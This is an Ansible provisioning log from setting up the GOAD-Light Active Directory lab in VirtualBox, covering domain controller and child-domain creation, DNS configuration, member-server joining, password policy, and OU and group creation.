 [started TASK: common : Firewall | Allow RDP through Firewall on srv02]

TASK [common : Firewall | Allow RDP through Firewall] ******************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: common : Add a network static route on dc01]
 [started TASK: common : Add a network static route on dc02]
 [started TASK: common : Add a network static route on srv02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc01]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on dc02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key on srv02]

TASK [settings/keyboard : Add Keyboard Layouts registry key] ***********************************************************************************************************************************************
ok: [dc01] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [srv02] => (item=0000040C)
ok: [dc01] => (item=00000409)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc01]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on dc02]
 [started TASK: settings/keyboard : Add Keyboard Layouts registry key for default users on srv02]

TASK [settings/keyboard : Add Keyboard Layouts registry key for default users] *****************************************************************************************************************************
ok: [srv02] => (item=0000040C)
ok: [dc02] => (item=0000040C)
ok: [dc01] => (item=0000040C)
ok: [srv02] => (item=00000409)
ok: [dc02] => (item=00000409)
ok: [dc01] => (item=00000409)

PLAY [build all no update] *********************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/no_updates : Disable windows update on dc01]
 [started TASK: settings/no_updates : Disable windows update on dc02]

TASK [settings/no_updates : Disable windows update] ********************************************************************************************************************************************************
changed: [dc01]
changed: [dc02]

PLAY [Launch windows updates before continue] **************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=16   changed=2    unreachable=0    failed=0    skipped=5    rescued=0    ignored=0   
dc02                       : ok=11   changed=2    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
srv02                      : ok=10   changed=1    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   

[*] Run playbook : ad-servers.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-servers.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Prepare servers set admin password, set hostname] ****************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc01]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on dc02]
 [started TASK: settings/admin_password : Ensure that Admin is present with a valid password on srv02]

TASK [settings/admin_password : Ensure that Admin is present with a valid password] ************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: settings/hostname : Change the hostname on dc01]
 [started TASK: settings/hostname : Change the hostname on dc02]
 [started TASK: settings/hostname : Change the hostname on srv02]

TASK [settings/hostname : Change the hostname] *************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: settings/hostname : Reboot if needed on dc01]
 [started TASK: settings/hostname : Reboot if needed on dc02]
 [started TASK: settings/hostname : Reboot if needed on srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=9    changed=0    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=4    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   

[*] Run playbook : ad-parent_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-parent_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Main DC AD configuration] ****************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc01]

TASK [domain_controller : disable the registration of the Ethernet interface (NAT address) in DNS] *********************************************************************************************************
changed: [dc01]
 [started TASK: domain_controller : Ensure that domain exists on dc01]

TASK [domain_controller : Ensure that domain exists] *******************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Reboot to complete domain creation on dc01]
 [started TASK: domain_controller : Ensure the server is a domain controller on dc01]

TASK [domain_controller : Ensure the server is a domain controller] ****************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Reboot to complete domain controller setup on dc01]
 [started TASK: domain_controller : Be sure DNS feature is installed on dc01]

TASK [domain_controller : Be sure DNS feature is installed] ************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Check for xDnsServer Powershell module on dc01]

TASK [domain_controller : Check for xDnsServer Powershell module] ******************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : enable only the {{domain_adapter}} interface (local) for DNS client requests on dc01]

TASK [domain_controller : enable only the Ethernet 2 interface (local) for DNS client requests] ************************************************************************************************************
changed: [dc01]
 [started TASK: domain_controller : Configure DNS Forwarders on dc01]

TASK [domain_controller : Configure DNS Forwarders] ********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Install XactiveDirectory on dc01]

TASK [domain_controller : Install XactiveDirectory] ********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Ensure Administrator is part of Enterprise Admins on dc01]

TASK [domain_controller : Ensure Administrator is part of Enterprise Admins] *******************************************************************************************************************************
ok: [dc01]
 [started TASK: domain_controller : Ensure Administrator is part of Domain Admins on dc01]

TASK [domain_controller : Ensure Administrator is part of Domain Admins] ***********************************************************************************************************************************
ok: [dc01]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=17   changed=2    unreachable=0    failed=0    skipped=3    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-child_domain.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-child_domain.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Child DC AD configuration] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : disable the registration of the {{nat_adapter}} interface (NAT address) in DNS on dc02]

TASK [child_domain : disable the registration of the Ethernet interface (NAT address) in DNS] **************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Set configure dns to {{dns_domain}} on dc02]

TASK [child_domain : Set configure dns to dc01] ************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Install windows features - AD Domain Services on dc02]

TASK [child_domain : Install windows features - AD Domain Services] ****************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : Install windows features - RSAT-ADDS on dc02]

TASK [child_domain : Install windows features - RSAT-ADDS] *************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : add child domain to parent domain on dc02]

TASK [child_domain : add child domain to parent domain] ****************************************************************************************************************************************************
ok: [dc02]
 [started TASK: child_domain : Reboot on dc02]
 [started TASK: child_domain : enable the {{domain_adapter}} interface (local) for DNS client requests on dc02]

TASK [child_domain : enable the Ethernet 2 interface (local) for DNS client requests] **********************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Check for xDnsServer Powershell module on dc02]

TASK [child_domain : Check for xDnsServer Powershell module] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Configure DNS Forwarders on dc02]

TASK [child_domain : Configure DNS Forwarders] *************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : Install XactiveDirectory on dc02]

TASK [child_domain : Install XactiveDirectory] *************************************************************************************************************************************************************
changed: [dc02]
 [started TASK: child_domain : enable the Active directory web services if not enabled on dc02]

TASK [child_domain : enable the Active directory web services if not enabled] ******************************************************************************************************************************
changed: [dc02]
 [started TASK: dns_conditional_forwarder : Add dns server zone on dc02]

TASK [dns_conditional_forwarder : Add dns server zone] *****************************************************************************************************************************************************
changed: [dc02]

PLAY [Parent DC ADD DNS configuration] *********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: parent_child_dns : add dns delegation to child domain on dc01]

TASK [parent_child_dns : add dns delegation to child domain] ***********************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)
 [started TASK: parent_child_dns : create conditional forwarder to child domain on dc01]

TASK [parent_child_dns : create conditional forwarder to child domain] *************************************************************************************************************************************
changed: [dc01] => (item=north.sevenkingdoms.local)

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=9    changed=2    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=13   changed=8    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : wait5m.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
wait5m.yml

PLAY [wait] ************************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on localhost]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [localhost]
 [started TASK: Wait 5 minutes to finish on localhost]
Pausing for 300 seconds
(ctrl+C then 'C' = continue early, ctrl+C then 'A' = abort)
Press 'C' to continue the play or 'A' to abort 

TASK [Wait 5 minutes to finish] ****************************************************************************************************************************************************************************
ok: [localhost]

PLAY RECAP *************************************************************************************************************************************************************************************************
localhost                  : ok=2    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-members.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-members.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [srv02]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [play servers AD configuration] ***********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: member_server : prioritize the {{domain_adapter}} interface (local) as the default for routing on srv02]

TASK [member_server : prioritize the Ethernet 2 interface (local) as the default for routing] **************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Set configure dns to {{dns_domain}} on srv02]

TASK [member_server : Set configure dns to dc02] ***********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Verify File Server Role is installed. on srv02]

TASK [member_server : Verify File Server Role is installed.] ***********************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Add member server on srv02]

TASK [member_server : Add member server] *******************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: member_server : Reboot if needed on srv02]


TASK [member_server : Reboot if needed] ********************************************************************************************************************************************************************
changed: [srv02]

PLAY [play workstations AD configuration] ******************************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=7    changed=5    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-trusts.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-trusts.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Trusts configuration prepare] ************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Trusts configuration] ********************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Trusts configuration end] ****************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Adjust DNS conditional forwarded configuration] ******************************************************************************************************************************************************
skipping: no hosts matched

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   

[*] Run playbook : ad-data.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
ad-data.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [DCs AD data configuration] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: password_policy : set password policy on dc01]
 [started TASK: password_policy : set password policy on dc02]

TASK [password_policy : set password policy] ***************************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: ad : Ensure Administrator is part of Domain Admins on dc01]
 [started TASK: ad : Ensure Administrator is part of Domain Admins on dc02]

TASK [ad : Ensure Administrator is part of Domain Admins] **************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
 [started TASK: ad : Create OU on dc01]
 [started TASK: ad : Create OU on dc02]

TASK [ad : Create OU] **************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Vale', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'IronIslands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Riverlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Crownlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Stormlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Westerlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Reach', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Dorne', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Create Groups Universal on dc01]
 [started TASK: ad : Create Groups Universal on dc02]
 [started TASK: ad : Create Groups Global on dc01]
 [started TASK: ad : Create Groups Global on dc02]

TASK [ad : Create Groups Global] ***************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Small Council', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonStone', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'KingsGuard', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonRider', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
 [started TASK: ad : Create Groups domainlocal on dc01]
 [started TASK: ad : Create Groups domainlocal on dc02]

TASK [ad : Create Groups domainlocal] **********************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'AcrossTheNarrowSea', 'value': {'path': 'CN=Users,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'AcrossTheSea', 'value': {'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
